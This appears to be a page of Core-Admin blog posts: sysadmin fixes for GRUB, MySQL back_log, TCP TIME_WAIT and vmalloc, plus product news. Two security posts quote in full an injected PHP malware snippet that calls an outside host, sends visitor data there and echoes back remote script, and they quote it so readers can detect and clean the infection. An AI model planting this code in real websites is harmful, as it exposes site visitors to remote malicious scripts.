Blog

KB: 16052014-001: Fixing /usr/sbin/grub-probe: error: no such disk. for device /dev/md0 error

So, you are running a Debian like system, and you are upgrading your kernel and during the process you the the following error:

update-initramfs: Generating /boot/initrd.img-2.6.32-5-amd64
Examining /etc/kernel/postinst.d.
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 2.6.32-5-amd64 /boot/vmlinuz-2.6.32-5-amd64
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 2.6.32-5-amd64 /boot/vmlinuz-2.6.32-5-amd64
Generating grub.cfg ...
/usr/sbin/grub-probe: error: no such disk.
run-parts: /etc/kernel/postinst.d/zz-update-grub exited with return code 1
Failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.32-5-amd64.postinst line 799.

Possibly you are googling it out and you’ve found various solutions like the following links but none of them works:

http://www.linuxexpert.ro/Troubleshooting/grub-error-no-such-disk.html

https://lists.debian.org/debian-user/2011/06/msg00359.html

http://www.linuxquestions.org/questions/debian-26/usr-sbin-grub-probe-error-no-such-disk-922118/

The curious thing is that your system is running perfectly, there is no error at /proc/mdstat (please do a cat over that file just to be sure) and if you run a simple “ls -la ” over /dev/md0 and the disks components that made that disks you find out that everything is right. No error.

At some point, you find that you have to run the following command to “check” what’s grub-probe idea about your hardisks:

/usr/sbin/grub-probe --device-map=/boot/grub/device.map --target=fs -v /boot/grub

However, it is reporting at the end:

/usr/sbin/grub-probe: info: opening md0.
/usr/sbin/grub-probe: error: no such disk.

If you have all this elements in common, please, just be sure you have mdadm command available. It is possible that you have removed it by mistake. Because grub-probe uses mdadm –examine /dev/md0, it is confusing an error from that command with a command not found error.

Please, try the following to see if it works:

>> apt-get install mdadm
>> apt-get install -f

Note well for Core-Admin users

If you are running Core-Admin’s mdadm checker, it will ensure you have mdadm available apart from checking your hard disks and the details inside /proc/mdstat.

Please, be sure you have mdadm checker to ensure this error do not reach your system.

Posted in: Administration, Debian, Debian Squeeze, KB

Leave a Comment (0) →

KB: 03042014-001: Dealing with possible back log problems with MySQL

Problem description

Given a server running MySQL with a high connection creation rate, if you receive the following notifications:

WARNING: found MySQL connection failure ((2003, "Can't connect to MySQL server on '127.0.0.1' (110)")), retrying query..

And however, the server is working well, and it is possible to query the server at the address/port provided, then it is possible that there is a full “back log TCP” problem.

This TCP incoming connection accept rate depends on the size of the queue (the size of the current backlog) and how much time a connection stays in the queue (for example, the server may be lagging behind picking connections from the queue).

In the case of MySQL, default value for back log is set to 50. This way we can have up to 50 connections waiting to be accepted.

Note this value has nothing to do with “max_connections” which is the number of concurrent connections, already accepted, that the server is going to work with.

Let’s say “back_log” is the queue to get inside a place, and “max_connections” is the place’s capacity.

Possible problem solution

Assuming there are not other problems causing this 2003 code, that is, that:

  1. There’s no firewall blocking certain operations, not all, for example a burst rate limit.
  2. There is not a routing problem that is causing connections to work only sometimes.

If this is not the case, and the server is working, but from time to time some connections get rejected without a reason, and there are available connections (running SHOW PROCESSLIST), then follow next steps:

  1. Update file /etc/mysql/my.cnf, and inside section [mysqld] add the following declaration:
    back_log = 200
  2. After that, restart mysql (you need to, this value does not take effect after a reload).
    >> service mysql restart
  3. Then, connect and run the following instruction:  SHOW VARIABLES to check if backlog is correctly configured .

Using Core-Admin to configure back_log

Doing this configuration with Core-Admin is really easy. You only have to:

  1. Load MySQL management tool (from inside the machine’s view).
    gestor-mysql
     
     
  2. Now, click on “Options”:
    opciones
     
     
  3. After that, click on “Configure”:
    configurar
     
     
  4. Then the configuration panel will appear. Now there, you can configure he back log value needed.

Posted in: MySQL, Performance

Leave a Comment (0) →

KB: 24032014-001: Dealing with TIME WAIT exhaustion (no more TCP connections)

Article keyword index

Sympton

1) You have received a time_wait_checker notification 2) or after a review, you find that all services are up and working but they cannot accept more connections (even though they should) or some services cannot connect to internal services like database servers (like MySQL). At the same time, if you run the following command you get more than 30000 entries:

>> netstat -n | grep TIME_WAIT | wc -l

Another sympton is that specific services like squid fails with the following error:

commBind: Cannot bind socket FD 98 to *:0: (98) Address already in use

Affected releases

All releases may suffer this problem. It’s not a bug but a resource exhaustion problem.

Background

The problem is triggered because some service is creating connections faster than they are collected for reuse. After TCP connection is closed, a period is started to receive lost packages for that closed connection, to avoid mixing them for newly created connections with the same location.

Every time a TCP connection is created, a local port is needed for the local end point. This local end point port is taken from the ephemeral ports range as defined at:

/proc/sys/net/ipv4/ip_local_port_range

If that range is exhausted, no more TCP connections can be created because there is no more ephemeral (local port) available.

There are several ways to solve this problem. The following solutions are listed in the order as they are recommended:

  1. Identify the application that is creating those connections to review if there is a problem.
  2. If it is not possible, increase ephemeral port range. See next section.
  3. If increasing ephemeral port range does not solve the problem, try reduce the amount of time a connection can be in TIME WAIT. See next section.
  4. If that does not solve the problem, try activating TCP time wait reuse option which will cause the system to reuse ports that are in TIME WAIT. See next section.

Solution

In the case you cannot fix the application producing these amount of TIME_WAIT connections, use the following options provided by the time_wait_checker to configure the system to better react to this situation.

  1. First, select the machine and then click on Actions (at the top-right of the machines’ view):actions
  2. Now, click on “Show machine’s checkers”:
  3. Then select the “time_wait_checker” and after that, click on:
    configure.
  4. After that, the following window will be showed to configure various TIME_WAIT handling options:Core-Admin Time-wait's checker options

Now use options available as described and using them in the recommended order.

Some notes about Tcp time wait reuse and recycle options

Special mention to Tcp time wait recycle  ( /proc/sys/net/ipv4/tcp_tw_recycle ) option is that it is considered more aggressive than Tcp time wait reuse  ( /proc/sys/net/ipv4/tcp_tw_reuse ). Both can cause problems because they apply “simplifications” to reduce the wait time and to reuse certain structures. In the case of Tcp time wait recycle, given its nature, it can cause problems with devices behind a NAT by allowing connections in a random manner (just one device will be able to connect to the server with this option enabled). As indicated by the tool, “Observe after activation”. More information about Tcp time wait recycle and how it relates to NATed devices at http://troy.yort.com/improve-linux-tcp-tw-recycle-man-page-entry/

In general, both options shouldn’t be used if not needed.

Long term solutions

The following solutions are not quick and requires preparation. But you can consider them to avoid the problem in the long term.

SOLUTION 1: If possible, update your application to reuse connections created. For example, if those connections are because internal database connections, instaed of creating, querying and closing, try to reuse the connection as much as possible. That will reduce a lot the number of pending TIME_WAIT connection in many cases.

SOLUTION 2: Another possible solution is to use several IPs for the same service and load-balance it through DNS (for example). That way you expand possible TCP location combination that are available and thus, you expand the amount of ephemeral ports available. Every IP available and serving the service double your range.

In any case, SOLUTION 1 by far best than SOLUTION 2. It is better to have a service consuming fewer resources.

Posted in: KB, Linux Networking

Leave a Comment (0) →

KB: 19032014-001: Fixing kernel memory allocation problem

Sympton

If after enabling the firewall you get the following error:

iptables: Memory allocation problem

Or at the server logs you find the following indications:

vmap allocation for size 9146368 failed: use vmalloc= to increase size.

This means the kernel internal memory has reached valloc limit.

Affected releases

All Core-Admin releases that uses a Linux kernel superior or equal to 2.6.32.

Background

The first step is to check current limit. To that end, run the following:

>> cat /proc/meminfo | grep -i vmalloc
VmallocTotal: 124144 kB
VmallocUsed: 5536 kB
VmallocChunk: 1156 kB

In this example, VmallocTotal is telling us we have around 128M of allowed valloc memory.

With this value, we have to increase it to something bigger like 256M or a 384M (which may be too much).

Solution

To update this value we have to pass a parameter to the kernel at boot time.

The exact parameter is vmalloc=256M (configuring the right amount of memory you want). According to the boot loader you are using you’ll have to do the following:

1) LILO: Edit  /etc/lilo.conf to update the append declaration like follows:

image = /boot/vmlinuz
root = /dev/hda1
append = "vmalloc=256M"

2) GRUB 1.0: edit “kopt” variable at /boot/grub/menu.lst to include the declaration. A working example is:

kopt=root=UUID=b530efc1-0b0c-419e-affb-87eb9e18b0dc ro vmalloc=256M

After that, save the file and reload grub configurationl. This is usually done with:

>> update-grub

3) GRUB 2.0 edit /etc/default/grub to update GRUB_CMDLINE_LINUX_DEFAULT variable to include the following declaration:

GRUB_CMDLINE_LINUX_DEFAULT="quiet vmalloc=384M"

After that, you must reload configuration. This is usually done with:

>> update-grub

Posted in: KB

Leave a Comment (0) →

Using Core-Admin to resolve php+# web hacking

After a revision you find out that several web pages have been updated with code like follow or maybe a customer whose web is being blocked by the web browser is calling you because it is including suspicous code like:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) &amp;&amp; !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&amp;referer=".urlencode($_SERVER['HTTP_HOST'])."&amp;ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

These attacks do not pose any harm to the server if it is properly configured, but makes affected webpages to execute remote chatting code o ads that will make google chrome and many other browsers to block those pages because running that suspicious code.

Understanding these attacks

The problem about these attacks is that they update original files by including a “chirurgical” modifications making it difficult and annoying to get back to original state.

One option is to have a backup, but with the newer webs which use different shorts of caches and php-to-string files, makes it hard to recover. It is not possible to just recover those files by just replacing. You must get back to a consistent state (for example the last backup). This implies removing current web files and recover from backup files (so backup files don’t get mixed with current files that weren’t including at the backup).

After this, you must remember resetting/blocking all FTP accounts/password that were used during the attack.

First line of defense: know when happens the attack

Core-Admin provides you these knoledge as the attack happens. After the modification, Core-Admin’s file system watching service will report “possible php hash attack found” with an indication like follows:

Core-Admin: detecting php hash attack

After receiving this notification, you only have to run the following comand to find out the amount of files that were modified and the amount of FTP accounts that were compromised. The same command will help you through out the process of recovering infected files and updating ftp accounts’ password.

>> crad-find-and-fix-phphash-attack.pyc

After running above command, which only reports, you can now execute the same command with the following options to fix found files and to update FTP accounts:

>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

How did this attack happen?

This attack is connected with a network of servers that are in charge of applying these modifications along with a virus/malware software that infects machines that use known FTP clients. Here is how the attack develops:

  1. By using known FTP clients that save passwords at known places at the file system, the first part of the attack is established..
  2. It is suspected that using public Wifis and insecure networks while creating FTP session may be part of the problem too.
  3. After this, your machines get exposed to the virus/malware software that extracts stored FTP accounts by sending it to the servers that will perform the FTP attack.
  4. With this information, modification servers (that’s how we call them) that finally attack by using those FTP accounts, downloading original files, updating them and then uploading them back to its original place.

Important notes about the attack

It is important to understand that modification servers do not carry out the attack just after receiving compromised FTP passwords. They will wait to have several passwords to the same system and also they will delay the attack to disconnect both incidents (the web hack and the infection at your computers).

This way, they hope unaware users to not connect both incidents which otherwise will trigger a anti-virus scan by the user to stop information leaking.

In the other hand, they also wait to have several accounts to carry out a massive attack looking for confusion and/or magnitude to increase likehood that part of the infection will survive.

How can I prevent it?

There are several actions you can take to avoid these attacks:

  1. Try to not save FTP accounts in your FTP client. Try to save them into an application that stores those passwords protected by a password..
  2. Avoid using public Wifis and untrusted shared connections (like hotels) to connect to your FTP servers.
  3. If it is possible, after doing FTP modifications, enable read-only mode or disable the FTP account using Core-Admin panel. This way, even though the password is compromised, no modification will be possible..

Posted in: Core-Admin, Core-Admin Web Edition, PHP, Security

Leave a Comment (0) →

Automatic and integrated (DNS RBL) blacklist detection for Core-Admin

Do you ever wanted to know automatically when your servers get blacklisted (DNS RBL)?

For next Core-Admin release we have included a handy checker (rbl_check_checker) that allows to check against more than 100 known DNS rbl blacklists if any of your server IPs is blacklisted. And, if any server is listed, the checker tells you where to go to get more information to proceed to unblock them.

The checker also detects local lan IPs and in that case, it uses automatically a remote service to guess which public IP is running your server. Now, with this information the checker is able to also check for blacklisting those local/lan servers.

The checker integrates automatically into your Core-Admin and will give you fresh information for all your servers connected to the panel. See in action:

Improving your server IP reputation for mail deliveries

By having rbl-check checker running in your servers you can improve hugely your servers IP reputation because you can get instant information about any blacklisting for any running IP as it happens.

A prompt response is key to solve IP reputation problems. The faster you solve them, the less your mail services get affected. With that information you can react promptly taking required measures and to request IP blacklist removal.

Posted in: Blacklist, Core-Admin, Security

Leave a Comment (0) →

KB: 21012014-001: Fixing webhosting php-hash-update attack

Symptom

Core-Admin has reported unallowed changes at your hosting files and taking a look on them you find that they were updated with something similar to:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) &amp;&amp; !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&amp;referer=".urlencode($_SERVER['HTTP_HOST'])."&amp;ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

Affected releases

All

Background

This attack is done through the FTP server, downloading the original file and then updating it with the additional content. In essence, the attack looks for updating your files adding additional content without updating the rest.

This attack is possible because the password was stolen from a compromised equipment that has some virus or malware that looks for stored password at known locations or because an FTP session was opened using this password over an unsecure connection (like public wifis).

Solution

You have to find which files were updated to remove the “additional content added”. Also, you must reset password for all FTP accounts that were used to run this attack. Fortunetaly Core-Admin already includes an application that automates these tasks.

Follow next instructions to cleanup and reset all required FTP accounts:

  1. Run the following command as root in a server’s shell:
    >> crad-find-and-fix-phphash-attack.pyc
  2. Once finished, it will report which files were updated and which FTP account were compromised. Now, run the tool again asking to fix this:
    >> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

Posted in: KB, Security

Leave a Comment (0) →

ANN: Core-Admin 1.0.32-3207 ready for download!

A new Core-Admin stable release is available with lots of features and corrections. Here is a brief description:

  1. NEW PLATFORMS: supported, Ubuntu Precise Pangolin LTS 12.04.3 andDebian Wheezy 7.0. See all our supported platforms here:
    http://www.core-admin.com/portal/get-it/supported-platforms
  2. IMPROVEMENTS: Dojo 1.6.2 is now default engine for web-client. Applied several updates to improve interface experience. Now installer is available in english and spanish. Now app installers are able to show a progress window with task completion (fully programmable and available to developers creating core-admin applications), and many more, see change-log.
  3. DEVELOPMENT: released core-admin app-builder to allow creating checkers and new applications on top of Core-Admin.
  4. GENERAL+SECURITY: many fixes and security updates were applied to this release. See log for more details.

See all details at the release note.

Posted in: Core-Admin, Releases

Leave a Comment (0) →
Page 4 of 5 12345